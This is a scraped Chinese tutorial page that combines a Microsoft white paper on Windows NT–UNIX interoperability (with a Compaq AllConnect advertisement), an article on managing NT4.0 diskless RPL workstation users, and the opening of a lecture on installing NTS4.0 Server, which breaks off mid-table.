“Samba”能使用户从 LAN Manager 客户机、Windows for Workgroups 版本 3.11 客户机、Windows NT 客户机、Linux 客户机和 OS/2 客户机把磁盘和打印机重新定向到 UNIX 磁盘和打印机。一个通用的 UNIX 客户程序作为“Samba”套件的一部分提供。这个程序能使 UNIX 用户使用一个类似于 FTP 的接口访问任何其它 SMB 服务器上的文件和打印机。

跨平台管理

系统管理员越来越多地面临提供支持不同网络协议的系统间的互操作性的需要。有了 Windows 系列，系统综合程序得到对诸如 TCP/IP、NetBEUI、IPX/SPX、NetWare 核心协议之类的协议、系统网络体系结构、LAN Manager、X Window System 和 NFS 的支持。

为集成 Windows 和 UNIX 系统，Microsoft 在 Windows NT、Windows 95 和 Windows 98 中提供了简单网络管理协议 (SNMP) 服务。这样 UNIX 系统的网络管理员可以使用 SNMP 管理软件（如 HP OpenView）管理基于 Windows 的系统。

Windows NT 中的 SNMP 服务提供对 Internet Management Information Base-II (MIB-II) 和 LanMan MIB II 的支持。将来还会支持 Ethernet MIB、X.25 MIB 和 Host MIB。

HP OpenView 和 IBM NetView 是 Windows 系列上可用的基于 SNMP 的管理软件的典型。通过使用这样的产品，Windows NT Server 的系统管理员能够管理 UNIX 客户机。

全面说来，Windows NT 中的 SNMP 支持已经达到足够的数量，Windows NT 操作系统上有 HP OpenView、Ca UniCenter TNG 和 IBM Tivoli 可用。另外，Windows NT Server 和 Windows NT Workstation 都包括对 SNMP 管理信息库 (MIB) 文件的完全支持，可通过这些控制台管理这些文件。

对于已接受过 UNIX 系统管理培训的系统管理员，Windows NT 现在可以用 MKS 和 Softway Systems 所提供的工具提供相同的管理范例。两家供应商都提供 UNIX 样式的命令、工具和解释器环境，这样让基于 Windows NT 的系统看起来、操作和感觉都象基于 UNIX 的系统。没有诸如 awk、 grep 和 ps 等工具就别扭的系统管理员现在管理基于 Windows NT 的系统效率立刻变得高起来。Windows NT 5.0 将提供全套的内置命令行和脚本化的管理功能，提供基于 Windows NT 系统的真正的“奔驰”的管理。

Advanced Server for UNIX 具有直接从原始的 Windows NT Server 管理工具执行影响 UNIX 服务器的系统管理任务的功能。例如：

系统管理员可以将用户添加到 UNIX 和 Windows NT 用户数据库，这一点从与 Windows NT 操作系统一起提供的“域用户管理器”工具一步就可以做到。
使用 Windows NT Server 中的管理器工具，只需一步就可以在 UNIX 上创建对 PC 用户和 UNIX NFS 用户都可见的文件共享。
Windows NT 系统策略编辑器可以用于建立策略，给跨 UNIX 和 Windows NT 操作环境的特定计算机、用户和用户组定义环境。
通过支持 UNIX 服务器上的后端 Microsoft 管理调用，Advanced Server 使得接受了基于 Windows NT 的工具培训的系统管理员没有必要学习两套日常管理工具。

应用程序互操作性和数据事务

企业应用程序软件开发人员面对的一个主要挑战是决定如何将自己编制的应用程序与许多数据源最佳地集成。不仅有许多信息来源，而且由于新工具的出现和许多计算操作平台的使用，数据源经常变化。这种不断变化的环境导致应用程序损坏或很快变得过时而需要重新编写。

应用程序需要一种灵活的跨平台和跨数据源访问信息的方法，这种方法应随着时间的推移仍可信赖。为满足这一需要，软件业已经开发出了许多技术，可将到数据和信息的访问与特定格式和数据源分隔开来。最流行的方法之一是使用开放式数据库连接 (ODBC) 软件。这个软件现在可用于 Windows NT 和 DIGITAL UNIX 系统。有了 ODBC，应用程序开发人员现在可以编制可跨操作平台和数据库访问数据源的应用程序，与数据库所在的操作环境无关。这样便使得用户编写能够在 DIGITAL UNIX 或 Windows NT 上都同样能使用的应用程序代码。无论应用程序在哪种操作平台上运行，都可以连接到在任何操作平台上运行的数据库。用户现在可根据单位需要，灵活地使用 UNIX 和 Windows NT 操作平台。

当前的一代 ODBC 软件已经成熟，现在有许多软件开发人员富有 ODBC 经验。另外，软件技术提供了跨多种数据库的良好性能。开发人员可以从 INTERSOLV 获取 ODBC SDK for UNIX 驱动程序。用于 DIGITAL UNIX 的 ODBC 驱动程序和相关数据访问软件可以在下列网址找到： http://www.unix.digital.com/data-access 。

Microsoft 在过去的一年中投资开发新一代“数据访问”软件。新的软件技术是 OLE-DB 和 Active Data Object (ADO)。ADO 是用于访问数据源的新的编程接口。ADO 接口为开发人员带来了跨更多种数据源、使用起来更简单的编程接口。OLE-DB 是数据用户如何与数据源连接的新技术。OLE-DB 技术能支持更多种数据源，并支持多种数据源更容易地集成到应用程序。ADO 和 OLE-DB 技术在 Windows NT、Windows 95、Windows 98 和 DIGITAL UNIX 中正得到广泛的应用。

软件业为使用 Java 的应用程序开发人员开发了 JDBC。这个软件与 ODBC 类似，但支持 Java 应用程序访问不同操作平台的数据源和数据库。DIGITAL UNIX 和 Windows NT 两种平台都支持 Java 应用程序采用 JDBC 连接到不同的数据库。

Microsoft Transaction Server (MTS) 是 Windows NT 的一个基于组件的事务处理系统，集成了 TP 监视器和对象请求中继器的功能。它定义了一种编程模型，为管理企业应用程序提供了运行时间环境和图形管理工具。Microsoft Message Queue Server 可使应用程序通过发送和接收消息与其它应用程序通讯。

现在 Oracle 数据库可以参与基于 MTS 的事务。这可能是因为用于 Windows NT 的 Oracle 7.3.3 版支持 XA 1 ，并且 Microsoft 增强了 Microsoft Oracle ODBC 驱动程序，以便和 Microsoft Transaction Server 一起使用。

Microsoft Transaction Server 还能与 Oracle 8 数据库一起使用。但用户必须使用 Oracle 7.3 客户机访问 Oracle 8 数据库服务器。用户必须将与 Microsoft Transaction Server 2.0 版一起提供的 Microsoft Oracle ODBC 驱动程序和 Oracle 数据库一起使用，因为它是唯一能与 MTS 一起工作的 Oracle OBDC 驱动程序。

ODBC 连接池能够与 Oracle 数据库一起使用。连接池是 ODBC 3.0 和 3.5 驱动程序管理器内置的。因此，只要您使用的 Oracle ODBC 驱动程序的线程是安全的，连接池就能够工作。您使用 Microsoft Oracle ODBC 驱动程序时，Oracle 数据库连接被汇集成池。

用户可以访问 UNIX 和其它操作环境上的 Oracle 数据库，这些数据库可以参与事务。例如，在单一原子事务下，用户可以更新一个 Windows NT 的系统上的基于 Microsoft SQL Server? 的数据库、另一个基于 Windows NT 的系统上的 Oracle 数据库、UNIX 系统上的 Oracle 数据库。如果事务提交，三个数据库全部被更新。如果事务取消，在三个数据库上执行的所有工作都会回退。Microsoft Transaction Server 与任何从 Windows NT、Windows 95 或 Windows 98 可访问的 Oracle 操作平台互操作。在对 Microsoft Transaction Server 2.0 程序进行 Beta 测试期间， Microsoft Transaction Server 能与下列操作平台上的 Oracle 数据库一起使用：DIGITAL UNIX、HP-UX、IBM AIX、Windows NT 和 Sun Solaris。

让 MTS 组件更新 Oracle 数据库并不需要非得让 Microsoft 分布式事务协调程序 (DTC) 在 UNIX 和其它非 Windows NT 操作平台上运行。组件作出的所有更新都可以在单一分布式原子事务的控制下执行。之所以可以这样，是因为在 Windows NT Server 上运行的 DTC 起着事务协调程序的作用。DTC 与在基于 Windows NT 的系统上运行的 Microsoft Oracle ODBC 驱动程序通讯，将事务的结果告诉它。ODBC 驱动程序把这个信息传递到 UNIX 或其它系统上的 Oracle 数据库。Oracle 数据库随后按需要提交或退出事务。

使用事务访问 UNIX 或其它操作平台上的 Oracle 数据库时是否需要 Tuxedo、Top End 或 Encina 是一个经常提出的问题。回答是“不需要”，因为在这种情况下，在 Windows NT Server 上运行的 Microsoft 分布式事务协调程序起的是事务管理器的作用。

跨平台应用程序开发

组件模型技术定义一个支持可以重复使用的应用程序组件或多层分布式对象应用程序的环境。组件是预制好的应用程序代码构件，它们可以拼装成能正常运行的应用程序系统。

这一技术利用了对象技术所提供的最重要的优点之一：反复使用。应用 COM 技术，可以将应用程序组件重新组装成新的应用程序。开发人员可以把现有的应用程序的各个不同部分组合起来，创建可继承“父母”的行为特点的新的应用程序。这样可提高开发人员和单位的整体生产效率，因为需要从零开始编写的应用程序越来越少。

COM 及相关技术

COM（组件对象模型）是 Microsoft 自己的用于开发基于分布式事务的应用程序和定义对象通过开放的接口互操作方式的规范。作为指定这些接口的语言，Microsoft 接口定义语言 (MIDL) 与公用对象请求代理体系结构 (CORBA) IDL 类似。尽管 COM 在独立开发的能交互操作的跨语言的软件应用程序或组件方面与其它组件模型方法相似，但与众不同的是 COM 专门针对 Microsoft 32 位操作平台套件。

于 1997 年 8 月在 Windows NT 4.0 中发行的 Distributed COM (DCOM)，是 Microsoft 的 Internet 和组件战略的基础，在这里 ActiveX? 技术操作平台承担着 DCOM 对象的角色。作为一个有效的分布式对象模型，DCOM 扩展了 COM 模型，为应用程序提供了通过网络远程互操作的途径。

通过使用这种编程模型，使用 Visual C++ 开发系统、Visual Basic 或 Java 的编程人员能把应用程序封装成许多软件组件对象。组件对象是按 COM 定义的标准编写的、可再次使用的一段二进制码，可以与按相同标准编写的其它组件对象连接。这样，程序员可以只要编写应用程序一次，让它的功能可以在其它应用程序上使用。有了 DCOM，程序员的客户应用程序可以由远程服务器上的其它应用程序使用。

Microsoft 继续与合作伙伴紧密配合，获得工程、集成和市场经验，目的是把 COM 和 DCOM 应用到企业。为实现这一目标，Microsoft 一直在与许多合作紧密配合，以便把 DCOM 移植到非 Microsoft 操作平台上。在只有 Windows NT 的环境中开发的程序员会在有运行 Windows NT Server 的客户机和 UNIX 服务器的异机种环境中发现相同的 DCOM 应用程序编程接口 (API) 和相同行为。

通过在 UNIX 上使用 DCOM，用户可以：

把 DCOM 服务器应用程序从 Windows NT 操作环境移植到 UNIX 操作环境。
给现有的 UNIX 应用程序创建“包装”，提供到运行 Windows 的客户机运行的应用程序的 DCOM 访问。
开发利用 DCOM 分布机制的、新的分布式 UNIX 应用程序。这些应用程序可以最大程度地利用 DCOM 再利用、与版本和语言无关的功能。
作为战略合作者，Compaq Computer Corporation? 提供在 DIGITAL UNIX 上应用的 DCOM 正宗版本。Compaq 的这个产品提供了异机种 Windows NT 客户机/DIGITAL UNIX 服务器环境中的 DCOM 应用程序所需要的所有基本函数、库和工具。

有关支持 COM 的非 Microsoft 操作平台的详细信息，请访问： http://www.microsoft.com/com 。

在多组件模型技术的迅速壮大过程中，出现了许多推动这些技术互操作的机制。对象管理组 (OMG) 已经编写了 DCOM 和 CORBA 集成规范。DCOM 到 CORBA 的映射的定义是：在 DCOM 对象上发出的请求通过 Internet Inter-ORB 协议 (IIOP) 被传递到正确的 CORBA 对象的过程。这一转换的第一阶段事实上是把 DCOM 对象引用绑定到相应的 CORBA 对象上。第二个阶段涉及正确地为到对象的单独请求选择路由，并处理例外和终止条件。

Compaq 是第一家采用 ObjectBroker Desktop Connection 给自己的在市场上领先的 CORBA 产品 (ObjectBroker) 提供这种映射的。它以位于加拿大的 Visual Edge Inc. 的桥接技术为基础，为 ObjectBroker 用户提供了与 OMG 兼容的双向 CORBA-Active 连接，目的是将 UNIX 和 OpenVMS? 数据和信息无缝地与基于 Win32? 的台式机文档和支持 Web 的应用程序集成。现在归 Compaq 的合作者 BEA Systems 所有的 CORBA-COM 功能已不断地应用到许多未来的重要产品中。

一个最主要的 CORBA 提供商 Iona Technologies 最近从 Microsoft Corporation 得到 COM 许可，并推出 COMet，该产品在 CORBA 和 COM 之间架起了一个桥梁。OrbixCOMet 可在 COM 和 CORBA 应用程序之间提供双向集成，以及对 COM-CORBA 映射和 Automation-CORBA 映射的完全支持。它提供客户端桥接，让 COM/Automation 客户机能够与具有回叫支持的 CORBA 服务器直接对话。OrbixCOMet Desktop 给予开发人员使用 COM 和 CORBA 组件建立异机种系统的能力，对性能所造成的影响最小。开发人员可以使用他们熟悉的工具，无论是 Visual Basic、PowerBuilder、Delphi 或 Active Server Page，这样少走了许多与学习新对象模型相关的弯路，从而开发人员的工作效率得以提高。开发人员通过 COM 接口可以进入 CORBA 世界，而且在很大程度上不需要对 CORBA 有任何了解。

Windows NT 5.0 的将来

Windows NT 5.0 版将包含进一步增强 Windows NT 操作系统互操作性的服务。

Active Directory 是一个与 Windows NT Server 完全集成的目录服务，提供所有业务客户所需要的分层次的视图、可扩展性、可伸缩性和分布式安全。网络系统管理员、开发人员和用户能够访问这样的目录服务：

与 Internet 和 Intranet 环境无缝集成。
为它所包含的对象提供简单、直观的命名。
从小企业到最大的企业都使用。
能够用熟悉的工具（例如 Web 浏览器）工作。
提供简单、强大的开放式应用程序编程接口。
Active Directory 是分布式系统的重要部分。它可使系统管理员和用户利用目录服务作为信息和管理服务的来源。

统一的目录

Active Directory 将 Internet 名称空间的概念和操作系统的目录服务融合在一起。它使用轻型目录访问协议 (LDAP) 作为它的核心协议，能够跨操作系统工作，将众多的名称空间集成在一起。Active Directory 使用 LDAP 作为客户访问协议（ADSI 用于编程访问），支持 X.500 信息模型而无需系统承担 X.500 模型完全版本的开销。例如，Active Directory 可以自由地与其它基于 LDAP 的 UNIX 目录互操作。这样就让企业将企业网络中现有的多个名称空间统一起来并对它们进行管理。这样就能实现管理异机种软件和硬件环境所需的高水平的互操作性。

单个管理点

Active Directory 支持从单个点管理全部已发行资源，这些资源可能包括文件、外围设备、主机连接、数据库、Web 访问、用户、其它任意对象、服务等等。它使用 Internet 目录名称空间作为定位器服务，把域中的对象组织成由许多组织单位构成的层次结构，使多个域能够连接起来形成树形结构。由于没有主域控制器 (PDC) 或备份域控制器 (BDC) 的概念，所以管理进一步得到简化。Active Directory 只使用域控制器 (DC)，所有 DC 都是平等的。管理员可以更改任何 DC，更新会被复制到所有其它 DC 上。

可伸缩性

Microsoft 开发了许多通用的目录服务，从只有几百到几千个对象的小型安装到有数百万对象的非常大的安装都适用。Active Directory 支持多个存储区，每个存储区可以容纳一千万以上的对象，这样在维持简单的层次结构和管理方便的同时提供可伸缩性。在与 Microsoft 分布式文件系统结合后，Active Directory 会使网络与单一全局名称空间的目标更近一步。

安全

Active Directory 结合了 DNS（作为定位器服务）和 LDAP（作为核心协议）的最佳性能。这样与其他供应商提供的、在非 Microsoft 操作系统上运行的目录服务能更好地配合使用。这种目录服务能够支持一千万以上的对象，其可伸缩性无与伦比。除了 LDAP，Microsoft 的规划还包括在 Active Directory 中支持下列 X.500 协议：

1993 目录访问协议 (DAP) 的子集
1993 目录系统协议 (DSP)
目录信息阴影操作协议 (DISP)
Active Directory 是 Windows NT 操作系统中安全主体（包括用户帐户、组和域）的存储区。Active Directory 随后替代注册表帐户数据库，是本地安全颁发机构的受信组件。

Active Directory 允许采用 LDAP 通讯的客户机对目录服务进行经身份验证和未经身份验证的访问。在进行未经身份验证的访问时，客户机能够访问这样的对象：这些对象有允许每个人（或未经身份验证的用户）访问它们的 ACLS。Active Directory 让管理员能够作为一个整体在许多项中及在各个项内的属性上设置 ACLS。

LDAP 上的经身份验证的 Active Directory 访问支持基于私钥和公钥的身份验证。通过对基于公钥的身份验证和基于密码的身份验证的扩展，MIT Kerberos 5 版身份验证协议也得到支持。对 Internet 客户机也可以使用 X.509 v3 公钥证书进行验证。Active Directory 支持在使用适当的身份验证方案验证客户机身份后的模拟。这样就与 Windows NT 中的其余安全系统的紧密地结合。

Kerberos 身份验证协议定义客户机和网络身份验证服务（叫做密钥分发中心 (KDC)）之间的互操作。Windows NT 在每台域控制器上作为身份验证服务来 KDC。Windows NT 域与 Kerberos 领域相当，但还会继续被称为域。Windows NT Kerberos 版以 Kerberos 协议的 Internet RFC 1510 定义为基础。Kerberos 客户机运行时间以 SSPI 为基础，被作为安全提供者实现。初始 Kerberos 身份验证与 WinLogon 单一登录体系结构集成。Kerberos 服务器 (KDC) 与现有的在域控制器上运行的 Windows NT 安全服务集成，使用 Windows NT Active Directory 作为用户（主体）和组的帐户数据库。

Kerberos 身份验证协议增强了 Windows NT 的基础安全功能并具有下列特点：

在初始连接建立期间，服务器身份验证性能更快。验证客户机身份时应用程序服务器不需要连接到域控制器。这样就使应用程序服务器在处理很大数量客户机连接请求时就能够游刃有余。
在多层客户机/服务器应用程序体系结构中可进行身份验证委托。在客户机与服务器连接时，服务器模拟那个系统上的客户机。但如果完成客户事务需要服务器与另一台后端服务器进行网络连接时，Kerberos 协议支持身份验证委托，让第一台服务器代表客户机与另一台服务器连接。委托也能让第二台服务器模拟客户机。
在域间身份验证时存在传递信任关系。用户可以在域目录树中的任何域验证身份，因为每个域中的 KDC 信任目录树中的其它 KDC 颁发的票证。传递信任简化了有多个域的大型网络的域管理。
RFC 1510 中定义的 Kerberos 5 版身份验证协议经过了广泛的业界人士的评论，在安全兴趣组中很有名。

小结

Windows NT 和 UNIX 之间的互操作性在现在的异机种计算环境中是必需的。来自网络的数据、应用程序、管理层、工具和技术让这些系统互操作。这些工具或者内置在 Windows NT 中，或者已经可以从越来越多的第三方供应商得到。

Microsoft 与战略合作者们（例如 Compaq Computer Corporation）一起完全承诺解决互操作性问题，因为用户们希望将 Windows 与他们现有的 UNIX 和大型机环境集成。用户们希望利用过去在应用程序和系统上的投资，同时能够利用分布式计算技术提供的好处。

有了 Microsoft 及其战略伙伴，用户们能够建立互操作解决方案，以实现他们降低拥有总成本和最大限度地提高利润值的目标。用户们将会看到这些技术还会不断进步，让运行 UNIX 和 Windows NT Server 的异机种网络的部署和管理更简单。

用户们可以在 Microsoft TechNet 和 Windows NT Server Web 站点找到有关互操作性的详细信息。

附录

由全世界经验最为丰富的 Windows NT 集成服务提供商提供。

您打来电话，想要将 Windows NT 和 UNIX 环境集成 - 建立开放的、可伸缩的环境，这正是使您的业务保持竞争力所需要的。选择正确的服务提供商对工程的成功非常重要，所以现在就要问几个刁钻的问题。

牢固的基础建立在知识的基石上。

在谈及给运行 Windows NT Server 和 UNIX 的新的集成基础结构打基础时，采用彻底的方法是值得的。要想从您选定的解决方案提供商那里得到您需要的执行质量，您必须事先提出几个刁钻的问题：

您实际进行过多少次 Windows NT Server 和 UNIX 集成？
您有多少工程师受过 Windows NT 和 UNIX 培训并具有使用它们的经验？
在您完成工作后会培训我们的员工吗？
您是否具有使用所有主要的 UNIX 操作系统的经验？
用于 UNIX 和 Windows NT Server 的 Compaq AllConnect? 多供应商集成程序就是用来解决这些问题的。AllConnect 是迄今为止编写的最综合的 Windows NT 集成程序。得到数千具有实际 Windows NT 和 UNIX 集成经验的工程师有力支持的 AllConnect 提供了无与伦比的灵活性、可靠性和可伸缩性。

AllConnect 集排名在前的 Compaq 服务单位（在客户满意度上排名第一，Computer World, 1997）、来自 Compaq 的前沿软件和我们的业务合作者的产品于一身。Compaq 甚至将知识传输设计程序，以帮助您在我们完成工作很长时间后仍能使系统维持运转和增长。

Compaq 在过去的五年中投资搞了一个巨大的项目，以确保对我们最有经验的工程师（包括我们的 UNIX、NetWare 和 VINES 专家）进行深入的 Windows NT Server 培训，使他们获得经验，以满足您的集成需要。我们认识到“纸上谈兵”对复杂的集成解决方案的实际部署是不够的，所以我们在把解决方案提交给您之前要进行内部测试。

有了这样的投入，我们所看到的成果也就不足为奇了。竞争才刚刚开始，Compaq 已经拥有了经过证实的成功记录，有 150 多万用户得到了我们的 AllConnect for UNIX、Affinity for OpenVMS 和 NOS Migration 服务的支持。

Compaq 已经发展了 Windows NT 和所有主要 UNIX 操作系统（例如 DIGITAL UNIX、Solaris 和 HP-UX）的实质技术。

这是完全是有可能的，因为 Compaq 早在五年前 Windows NT 的第一个测试版发行时（那时几乎没有竞争者看到它的巨大潜力）就已经积极地参与到 Windows NT 的大规模发展之中。此外我们还与 Microsoft 结成战略同盟，以共享各种技术和开发下一代 Windows NT 64 位和群集技术。

这是完全有可能的，因为我们有开发 DIGITAL UNIX（世界上最可靠的和完全执行的 64 位 UNIX 操作系统）的第一手经验。

此外，我们的 Windows NT 专家还具有全行业最低的人员更新率 - 只有 8%，与之相对的是全行业的平均值是 25% - 选择了 AllConnect，就意味着服务的连续性会更大。最重要的一点，可能是我们把知识传授给您的人员，这样他们可以在往后的日子维持和建立您的环境。

AllConnect: Windows NT 与 Multivendor UNIX 集成的综合解决方案

每个 Windows NT 集成都有其特殊性。有的注重解决具体问题，有的则影响整个企业 IT 环境。AllConnect 是围绕一系列集成套件而研究出来的，这些套件可以自定义部署以满足您的特殊要求。

这些集成套件包括：

基础结构
企业文件和打印
应用程序集成
支持 Web 的应用程序
网络和系统管理
Compaq AllConnect - 精湛地建立您未来操作环境

我们可以得到下面的结论。我们了解将 Windows NT 与您现有的和将来的计算环境集成涉及到的问题。我们的业务以客户为中心，让您能够按您所需来利用我们的帮助。我们有经过数百万用户数千次验证的可靠的部署规划。

此外，我们的程序工程师已经积累了数千工程师 - 年的实际 Windows NT 与 UNIX 集成的经验，而竞争对手还处在读手册阶段。这些得来不易的经验会使您在未来的几年内继续受益，因为没有人比我们更擅长传授知识 - 确保您成为能够维护和发展您的解决方案的专家。毫无疑问，当您的企业计算环境开始运转时，您需要您能信任的人来控制。您需要 Compaq AllConnect 来将多供应商 UNIX 与 Windows NT 集成在一起。

返回


NT4.0无盘工作站用户管理

《一键清理系统垃圾》

NT4.0无盘工作站用户管理

随着用Windows NT 4.0架设无盘工作站的方法为大家所熟知，Windows NT无盘的管理已经成了一个大问题，下面介绍一下NT无盘的用户管理（DOS部分）。

一、 安装

在安装NT无盘的过程中有以下几个方面是值得用户注意的：

①在安装NT服务器时一定要使用NTFS分区格式，而不能使用FAT分区格式。因为NT服务器的很多安全特性是靠NTFS文件系统来完成的，如果使用FAT文件格式，则很多安全特性无法实现。

②在安装NT无盘的环境下，如果工作站同时开机，每一个10MB网段上最好不要超过12台工作站（指DOS，WIN95另议）。建议在服务器上多加1至3块网卡，每一网卡为一个网段。如果数量更大的话，建议在服务器上安装100MB网卡，这样每100MB网段可以连接的机器数量可达100台左右。

③在安装RPL服务时，建议将RPL目录不要放在Windows NT子目下，而是放在另一个逻辑盘上，否则无盘用户可以无限制地向服务器拷贝文件，而导致服务器上磁盘很快就用光了。

二、构建映射盘C的目录体系

NT的RPL工作站在开机时，要利用各启动配置文件中的FIT文件来构造C：盘的内容。一般先把需要的软件拷贝到RPLFILES\BINFILES目录下，然后在RPLFILES\PROFILES\配置名\下建立相应的子目录，然后在相应的FIT文件中作设置，使得BINFILES\PROFILES目录有一个对应，另外还要对需要特殊设置的文件作说明，使它们与各工作站机器目录上的文件作对应。如果是应用软件在执行过程中可以自动建立各种记录文件那么至此就完成了，如果不是的话，如TT软件在启动时必须找到TT.HIS文件，那么就将TT.HIS拷贝到RPLFILES\MACHINES\工作站名目录去。

三、软件的安装与设置

1.Windows 3.2的安装与设置

①用SETUP/A将Windows 3.2的全部文件安装到WIN子目录。

②将C:\WIN AUTOEXEC.BAT中的PATH加上并且要放在最前面。

③在各工作站上，用SETUP/N安装。

2.UCDOS 7.0的安装与设置

①安装网络版UCDOS7.0时，不承认C：盘为网络盘，可以先映射D盘及E盘，分别安装UCDOS7.0，然后用FC比较RD16.COM和KNL.COM就可以发现各有一字节的不同，都是代表着安装的盘符，比较以后用DEBUG可以轻易的将其修改为C：盘，然后在服务器上将UCDOS拷贝到RPLFILES\BINFILES\UCDOS目录即可。

②智能全拼的设置，安装完成后智能拼音不能使用记忆词组，将PY.USR的权限中RPLUSER读取变为改写，即可正常使用。

③邮政信息(POST.DAT)名片管理(CARD.DAT)闹钟服务在安装完成后不能进入，只要将以上文件的权限改为读写即可。

④WPS的使用需要将WPS.OV1的权限改为读写才可以使用。

3.内存的优化管理

CONFIG实例:

DEVICE=C:\DOS\HIMEM.SYS /TESTMEM:OFF

DEVICE=C:\DOS\EMM386.EXE NOEMS X=9380－9FFF I=CC00－F7FF

DOS=HIGH,UMB

四、大用户量管理

Windows NT无盘提供的是基于工作站的安全，每一台机器中都只有一个DATA子目录是具有全部权限的，这就造成了多人使用一个工作目录时互相删除文件的问题。在实践中我觉得以下两个方法是比较可行的。

1.多重FIT文件与AT命令相结合。

①为了让多个用户在使用同一台计算机时不能互相删除文件，则最好是每一个用户有一个独立的工作目录。这个设置可以在FIT文件中完成，我们为每一个组设置一个FIT文件，规定DATA目录的映射，而在NT无盘环境下不允许另外建立RPL目录的映射，并且用户不能看到其他用户的DATA目录，因此数据是安全的。

②为每一个FIT文件建立一个批处理，作用是将组的FIT文件拷贝成DOS622.FIT。

③在服务器管理器中启动调度服务（Schedule），并把启动的方式改为自动。

④在命令提示符下AT命令给定各批处理程序的执行时间。如，命令AT 8:00 /every: M C:\301表示在每个星期一的8:00执行C:\301.BAT。

2.设置多个用户账号，给每个用户分配目录，开机时输入相应用户名，然后再手工映射目录到一逻辑盘。

返回


NT4.0组网技术系列讲座(一)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(一)

NT4.0组网技术系列讲座(二)
NT4.0组网技术系列讲座(三)
NT4.0组网技术系列讲座(四)
NT4.0组网技术系列讲座(五)
中小企业INTERNET 建站指南(一) NT 的安装
中小企业INTERNET 建站指南(二) 给WINNT SERVER 4.0补补
中小企业INTERNET 建站指南
Windows NT环境下的系统容错技术
MS Windows NT操作平台：与UNIX的企业互操作性(M$)
Windows NT卷集和带区集的建立及应用
NT SERVER 如何做镜像
Windows NT的硬盘管理特点
IIS组建Intranet完全手册
NT Server的AT命令详解
NT无盘win95的调试和后期工作
Windows NT 4.0下无盘工作站的建立
如何在Win95/98/NT上调试CGI程序
Windows NT网络服务器的ASP危机
NT网卡和Novell网卡互用
NT网上电子邮件系统的建立(一)
NT网电子邮件系统的建立(二)
NT4.0无盘工作站用户管理
为NT安装Lan Manager V2.0 DOS工作站
Windows NT网络的资源共享
Windows NT服务器及工作站的安装
拨号 Internet 邮件服务主机配置
利用Exchange建立Internet电子信箱
Intranet接入Internet的技术要点
利用Microsoft Mail邮局建立简易电子邮件系统
安装电子邮件服务Exchange Server 5.5
Winnt server--支持Windows 95的最佳网络平台
让Windows NT的服务程序按时作息
在NT SERVER如何配置拨号上网
设置imail成为一个可用的mail server 安装NT Server服务器
Windows 95工作站如何登录到Windows NT网络
Windows NT4.0下建立PWin95无盘工作站的注意事项
Windows NT4.0网络中漫游用户配置文件的建立
快速安装中文Windows NT 4.0下的DOS工作站
测试网络连接
连接网络(硬件)
局域网安装软硬件要求及有关假设
关于 磁盘管理器
Windows NT4 磁盘分区对策
Windows NT服务器用作路由器
NT设置软件路由
基于 TCP/IP 的动态 RAS 连接器
如何使用RAS远程回拨
一些MS常用的缩写词
NT网的无盘工作站远程登陆
利用NT 4．0实现VPN
Windows NT网络的资源共享
建立因特网上的邮件服务器
在NT下实现拨号上网
NT Server4.0做静态路由器
NT Server用作 Internet的网关
WinNT中安装内置MODEM
Windows NT常见问题解答
NT服务器常见问题精华
Windows NT的安全机制浅析
清除NT4.0启动时的一个对话框
Windows NT系统崩溃时可借鉴的工具
NT无盘win95安装问题精解
Windows NT4.0硬盘管理入门
Windows NT安全性理论与实践
不可不会的NT注册表修改技巧
NT磁盘镜像中断后的恢复
NT网络配置不当引起网络安全一例
NT使用中的若干常识


NT4.0组网技术系列讲座(二)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(二)

NTS4.0服务器的安装和设置

    本讲将介绍NTS4.0服务器的安装过程和方法，同时对安装中或安装后可能出现的故障原因也进行必要的分析，并提供对应的解决办法。另外，本讲所涉及到的大量内容，也适用于网络的日常维护。

一、安装NTS4.0前的准备工作

    首先，安装NTS4.0服务器要符合上一讲所要求的硬件配置。有人认为，在机器的配置可满足NTS4.0安装和运行的条件下，只要能够使用DOS操作系统就能够成功安装NTS4.0，事实上这种认识是错误的。因为与NTS4.0相比较，DOS不能算是一个“真正的操作系统”，所以当机器存在较大的故障时，DOS可能会照常工作（看起来在正常工作），而NTS4.0则不行。NT4.0对硬件完好性的要求是很严格的,有时甚至是非常苛刻的。为此在安装NTS4.0前有必要对机器的主要硬件进行全面检测，这些硬件主要包括硬盘、网卡和光驱等。
在安装NTS4.0前，建议通过基于DOS的专门诊断工具对主要的硬件进行全面检测。例如，可通过SCANDISK.EXE对硬盘进行诊断；用MSD.EXE查看网卡或其他的组件在DOS环境下是否存在中断冲突；用MSCDEX.EXE测试光驱能否正常工作。只有当硬件测试通过后，才可安装NTS4.0，否则会浪费大量的时间和精力。

二、NTS4.0的安装方法

    根据需要，可以选择从NT3.X、Windows95/98操作系统上直接升级，也可从DOS、Windows95/98上安装，并实现系统的多重启动。如果选择的是直接升级，因为NTS4.0的Registry数据库与Windows95/98的不同，所以系统无法将Windows95/98上的应用程序升级到NTS4.0中，这些应用程序只能在安装好NTS4.0后重新安装，并且NTS4.0必须安装在另一个新的目录下。因此，当要安装的是专用服务器时，可选择直接升级；如果你的服务器不是专用服务器，则可选择从DOS或Windows95/98上安装，实现系统的多重引导。
    我们在安装其他软件时大都使用SETUP.EXE，而安装NTS4.0时，使用的安装文件为WINNT.EXE或WINNT32.EXE。其中WINNT.EXE可以在DOS、Windows95/98下执行，而WINNT32.EXE则是在NT真正的32位操作系统下执行。这两个安装文件都带有安装参数，参数可在NTS4.0光盘的目录下运行“WINNT/？”或“WINNT32/？”查看。为了满足不同的安装要求，表1列出了WINNT.EXE的主要参数和作用（WINNT32.EXE的参数与WINNT.EXE基本相同），供大家安装时参考。

表1 WINNT.EXE的主要参数和作用
主要参数 参数的作用
/S:sorecepath 指定Windows NT程序文件的位置
/I:inf_file 指定安装信息文件，默认文件为DOSNET.INF
/t:drive_letter 指定安装过程中临时文件存放的驱动器盘符
/X 防止建立启动盘
/B 从硬盘直接安装,不需要启动盘
/OX 从Windows NT CD建立启动盘
/U 升级老版本的Windows NT
/U:script 利用设置文件升级老版本的Windows NT
/R:directory 设定安装目

三、开始安装NTS4.0

    下面我们开始安装一台NTS4.0服务器。安装所用的计算机为普通PC机，选择从DOS6.22上安装。为了加快安装的速度，并方便安装结束后对系统进行必要的设置，建议将光盘上的源安装文件复制到硬盘上一个临时目录下（如：NTS_TEMP），直接从硬盘上安装。具体安装过程与安装Windows95时很相似，只要你对一些基本概念熟悉，在屏幕的提示信息下，安装过程是比较简单的。以下将列出安装过程中应注意的一些重要环节和解决方法。
